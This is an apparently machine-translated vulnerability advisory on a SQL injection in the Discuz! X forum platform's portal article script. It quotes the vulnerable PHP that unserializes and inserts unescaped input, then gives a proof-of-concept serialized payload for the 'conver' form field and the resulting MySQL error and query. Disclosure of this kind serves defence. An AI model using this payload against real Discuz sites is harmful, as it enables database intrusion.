Discuz! X is a community-based professional site building platform launched by Comsenz. It enables forums, personal spaces (SNS), portals, and groups) the application Open Platform is fully integrated to help websites implement one-stop services.
Sourceincludeportalcpportalcp_article.php
// 90 rows
If ($ _ G [gp_conver]) {
$ Converfiles = unserialize (stripcslashes ($ _ G [gp_conver]);
$ Setarr [pic] = $ converfiles [pic];
$ Setarr [thumb] = $ converfiles [thumb];
$ Setarr [remote] = $ converfiles [remote];
}
The variable $ converfiles does not have addcslashes.
$ Aid = DB: insert (portal_article_title, $ setarr, 1); // 122 rows
Enter the database query, so there is a SQL Injection BUG.
Proof of vulnerability:
Portal> portal management> channel topic posting permission
Post:
Http://www.bkjia.com/portal.php? Mod = portalcp & ac = article & catid = 1
Display the conver form in firebug.
Fill in a: 3: {s: 3: "pic"; s: 3: "xx"; s: 5: "thumb"; s: 2: "xx "; s: 6: "remote"; s: 2: "xx ";}
Submission is an error.
Error messages:
* [Type] the query statement is incorrect.
* [1064] You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near xx, 'remote' = xx, 'uid' = 1, 'username' = admin, 'id' = 0 at line 1
* [Query] insert into portal_article_title SET 'title' = xxxxxxxx, 'Your title' =, 'author' =, 'from' =, 'fromurl' =, 'dateline '= 1301158320, 'url' =, 'allowcomment' = 1,
'Summary '= xxxxxxxxxxxxxx, 'prename' =, 'preurl' =, 'catid' = 1, 'tag' = 0, 'status' = 0, 'pic' = xx, 'thumb' = xx, 'remote
'= Xx, 'uid' = 1, 'username' = admin, 'id' = 0
Author: Jannock, and Qing Edit